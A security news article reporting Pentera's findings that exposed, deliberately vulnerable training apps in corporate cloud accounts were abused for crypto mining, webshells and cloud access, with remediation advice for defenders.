Exposed Security Training Apps Become a Backdoor Into Enterprise Cloud Environments

Security teams have long relied on deliberately vulnerable web applications to train defenders and test internal defenses. New research shows those same tools are now being used as a shortcut into real enterprise cloud environments.

An investigation by automated penetration testing firm Pentera found that threat actors are actively exploiting misconfigured security training and testing applications that have been left exposed on the public internet. These include intentionally vulnerable platforms such as DVWA, OWASP Juice Shop, Hackazon, and bWAPP. When deployed carelessly inside cloud environments, Pentera says, they can provide attackers with direct access to sensitive systems at large organizations.

The risk is not hypothetical. Pentera identified 1,926 live vulnerable applications reachable from the open web, many deployed across AWS, Google Cloud, and Microsoft Azure environments. In many cases, the applications were tied to overly permissive identity and access management roles and executed from privileged cloud accounts, dramatically increasing the blast radius of a single compromise.

According to Pentera, the exposed systems were linked to multiple Fortune 500 organizations, including Cloudflare, F5, and Palo Alto Networks. The companies were notified of the findings and have since remediated the issues.

Pentera Labs confirmed that attackers are already exploiting these environments in the wild.

"During the investigation, we discovered clear evidence that attackers are actively exploiting these exact attack vectors in the wild – deploying crypto miners, webshells, and persistence mechanisms on compromised systems," the researchers said.

In one of the clearest indicators of active abuse, Pentera found that roughly 20 percent of 616 exposed DVWA instances contained artifacts associated with malicious activity. Many of the vulnerable deployments still used default credentials, and more than half exposed cloud credential sets that violated basic least-privilege practices.

Once inside, attackers were able to access cloud storage services such as Amazon S3, Google Cloud Storage, and Azure Blob Storage. In some cases, the compromised credentials allowed read and write access to secrets managers, interaction with container registries, and even administrative control over the cloud environment.

The attackers also demonstrated a focus on persistence. Pentera uncovered a script called watchdog.sh that reinstalled itself if removed, restored its code from a base64 encoded backup, and re-downloaded the XMRig cryptocurrency miner from GitHub. The script also pulled down additional tools from a Dropbox account, encrypted with AES-256, and actively killed competing miners running on the same host.

Other systems were found running a PHP webshell called filemanager.php, which enabled file browsing, uploads, downloads, and remote command execution. The webshell used hardcoded authentication credentials and was configured with a Europe/Minsk timezone setting, a detail that may offer clues about the operators behind the activity.

Security leaders say the findings highlight a basic but often overlooked operational failure. Kevin Kirkwood, CISO at Exabeam, described the exposure of these tools as an avoidable self-inflicted wound.

"Leaving a deliberately vulnerable testing tool in a space that can be discovered and exploited is the moral equivalent of running with sharp scissors. It just isn’t something that you want to do.

Threat actors have long been using the tools that were created to test and identify gaps in systems (Kali Linux, Burp Suite, et al…) that we are trying to correct. The difference is that these tools require action on the part of the threat actor to have those tools loaded somewhere during the attack.

In these latest breaches, the tools were left in plain view on the systems that they were then used to attack."

Pentera emphasized that the malicious artifacts were identified after responsible disclosure had already taken place and after affected organizations had fixed the exposed applications. The episode serves as a warning about how easily training infrastructure can become production risk when cloud environments move faster than governance.

The researchers recommend that organizations maintain a complete inventory of cloud resources, including security testing applications, and isolate them from production systems. Least-privilege IAM roles should be enforced for non-production environments, default credentials should never be left in place, and temporary testing resources should be configured to expire automatically.

As attackers continue to scan the internet for low-effort entry points, even tools designed to make defenders stronger can become liabilities when left unattended. In modern cloud environments, a forgotten test app can be all it takes to turn practice into breach.